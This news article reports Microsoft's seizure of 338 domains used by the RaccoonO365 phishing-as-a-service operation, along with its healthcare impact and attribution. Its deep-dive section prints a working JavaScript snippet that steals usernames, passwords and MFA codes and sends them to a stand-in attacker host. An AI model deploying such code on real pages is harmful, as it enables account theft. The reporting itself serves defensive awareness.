Since mid-2024, cybercriminals have leveraged a subscription-based phishing platform known as RaccoonO365 to harvest Microsoft 365 credentials at scale.
Emerging as an off-the-shelf service, RaccoonO365 requires minimal technical skill, allowing threat actors to deploy convincing phishing campaigns by impersonating official Microsoft communications.
These kits replicate Microsoft branding, email templates, and login portals to trick recipients into divulging usernames, passwords, and multi-factor authentication (MFA) codes.
As of September 2025, this operation has affected over 5,000 accounts across 94 countries, demonstrating the pervasive risk posed by commoditized social engineering tools.
In a coordinated legal action, Microsoft’s Digital Crimes Unit (DCU) secured a court order from the Southern District of New York to seize 338 domains facilitating the distribution of RaccoonO365, effectively dismantling the platform’s core infrastructure.
Microsoft analysts noted the rapid evolution of this service, which now boasts features that subvert MFA protections and automate credential harvesting at rates up to 9,000 targets per day.
The seized domains served as both phishing hosts and command-and-control interfaces for subscription management, crippling the ability of subscribers to launch fresh attacks.
Although not all stolen credentials resulted in direct network intrusions, the impact on high-value sectors, particularly healthcare, was severe.
At least 20 U.S. healthcare organizations reported delayed patient care, compromised lab results, and data breaches following successful RaccoonO365 phishing attempts.
Microsoft’s partnership with Health-ISAC underlined the public safety implications, as stolen credentials often served as initial access points for subsequent malware or ransomware deployments.
The DCU’s swift intervention illustrates the necessity of legal and technical countermeasures against low-barrier tools that empower malicious actors.
Microsoft analysts identified Joshua Ogundipe, a Nigeria-based developer, as the principal architect of RaccoonO365.
Through an operational security lapse revealing a cryptocurrency wallet, investigators traced over US$100,000 in subscription payments.
Ogundipe’s Telegram channel, with more than 850 members, advertised both standard phishing kits and a newly introduced “AI-MailCheck” service designed to refine spear-phishing efficacy.
This attribution underscores how streamlined criminal enterprises can scale with minimal overhead, challenging defenders to anticipate modular threat services.
Infection Mechanism Deep Dive
RaccoonO365’s infection mechanism revolves around dynamic form injection and transparent redirection tactics.
When a victim clicks a malicious link, the browser is redirected to a decoy login page that mirrors Microsoft’s official portal.
.webp "Microsoft Dismantles 300+ Websites Used to Distribute RaccoonO365 Phishing Service 3")
A small JavaScript snippet, injected at runtime, captures input fields and forwards credentials to the attacker’s server:-
document.querySelector('form').addEventListener('submit', function(e) {
e.preventDefault();
let creds = {
user: document.getElementById('username').value,
pass: document.getElementById('password').value,
otp: document.getElementById('mfa').value
};
fetch('https://attacker-server.com/collect', {
method: 'POST',
body: JSON.stringify(creds),
headers: {'Content-Type': 'application/json'}
}).then(()=> window.location.href="https://login.microsoftonline.com");
});This code ensures seamless data exfiltration while redirecting users to the legitimate login page, minimizing suspicion.
Advanced operators employ session-token reuse and header manipulation to bypass MFA prompts.
.webp "Microsoft Dismantles 300+ Websites Used to Distribute RaccoonO365 Phishing Service 4")
Combined with automated email distribution and AI-driven content variation, this infection chain exemplifies modern phishing sophistication and underscores the critical importance of layered defenses and user awareness.
Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free
Source link
